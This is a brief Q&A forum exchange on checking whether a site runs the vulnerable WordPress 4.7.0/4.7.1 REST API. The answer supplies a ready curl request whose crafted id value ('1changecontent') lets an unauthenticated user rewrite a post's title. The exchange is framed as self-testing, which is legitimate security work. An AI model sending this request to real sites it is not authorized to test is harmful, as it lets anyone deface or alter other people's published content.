Become a Patron!

0 votes
The WordPress version 4.7.0 and 4.7.1 are vulnerable to Content Injection. How can I validate the vulnerability?
by (147 points)

1 Answer

0 votes

Through this vulnerability, an unauthenticated user can modify the content of any post or page. Lets the post id is 1 and you can change the title using this Curl command.

curl 'https://www.example.com/blog/wp-json/wp/v2/posts/1' -X 'POST' -F 'id=1changecontent' -F 'title=Codeshikari' 

If your site is vulnerable then the title of the post id 1 will change to "Codeshikari".

by (188 points)
...